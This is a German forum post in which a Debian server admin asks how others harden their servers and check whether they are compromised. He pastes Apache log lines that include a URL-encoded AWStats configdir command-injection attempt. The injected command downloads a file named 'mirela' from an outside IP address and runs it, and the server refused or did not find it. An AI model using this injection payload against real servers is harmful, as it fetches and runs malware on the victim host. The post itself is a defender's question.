Hallo, ich habe einen debian sarge server mit gepatchtem awstats 6.4, dass ich durch .htacess vor unerlaubtem Zugriff schütze. Ich bekomme des öfteren Meldungen wie diese, da war glaube ich auch mal ein linux-wurm dabei.
Es scheint mir aber trotz häufiger Versuch nie ein erfolgreichjer Angriff dabei zu sein. Daneben gibt es die üblichen ssh Angriffe, mitden blödsinnigsten Benutzernamen. Root darf sich nicht anmelden, das läuft über sudo/su. Wie habt ihr euren server abgesichert? Ich benutze logcheck - filtern geht hier nicht, da es sich um einen virtuellen server handelt, soll aber ja auch nicht sinnvoll sein, wenn es sich bei dem Rechner nicht um eine explizite Firewall handelt. Womit untersucht ihr, ob der server noch "clean" ist? ciao Gerhard Hier mal so eine logcheck mail, mit 401 und 404 Fehlern, von dort gehen dann ja wohl keine Gefahren aus (ist ziemlich regelmäßig, dass das versucht wird, genauso wie die ssh Einlog-Versuche): [...] [ip.ip.ip.ip] - - [23/Dec/2005:00:07:15 +0100] "GET /cgi-bin/awstats.pl?configdir=| echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 401 479 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" [ip.ip.ip.ip] - - [23/Dec/2005:00:07:19 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=| echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" [Fri Dec 23 00:07:10 2005] [error] [client 62.4.80.149] File does not exist: /var/www/blogs/xmlsrv/xmlrpc.php [...] [Fri Dec 23 00:07:19 2005] [error] [client 62.4.80.149] script not found or unable to stat: /usr/lib/cgi-bin/awstats [...]